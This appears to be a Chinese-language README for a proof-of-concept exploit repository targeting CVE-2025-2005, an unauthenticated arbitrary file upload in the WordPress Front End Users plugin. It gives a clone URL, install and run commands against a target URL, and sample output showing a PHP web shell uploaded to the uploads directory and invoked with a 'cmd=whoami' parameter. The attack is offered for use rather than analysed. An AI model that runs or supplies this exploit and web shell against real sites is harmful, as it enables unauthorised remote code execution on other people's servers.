
WordPress FEUP Arbitrary File Upload Exploit (CVE-2025-2005)
本仓库提供了针对 WordPress Front End Users 插件(最高至 3.2.32 版本)的概念验证 (PoC) 利用程序。该插件因注册表单中缺乏 MIME/文件类型验证,存在任意文件上传漏洞,允许未经身份验证的攻击者上传恶意文件(例如 Web Shell),可能导致服务器端远程代码执行(RCE)。
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] 正在扫描站点:http://victim.com
[*] 找到 17 个页面。
[+] 在 http://victim.com/register 找到注册表单
[*] 正在上传 Shell...
[+] Shell 上传成功!
位置 ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
运行 ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami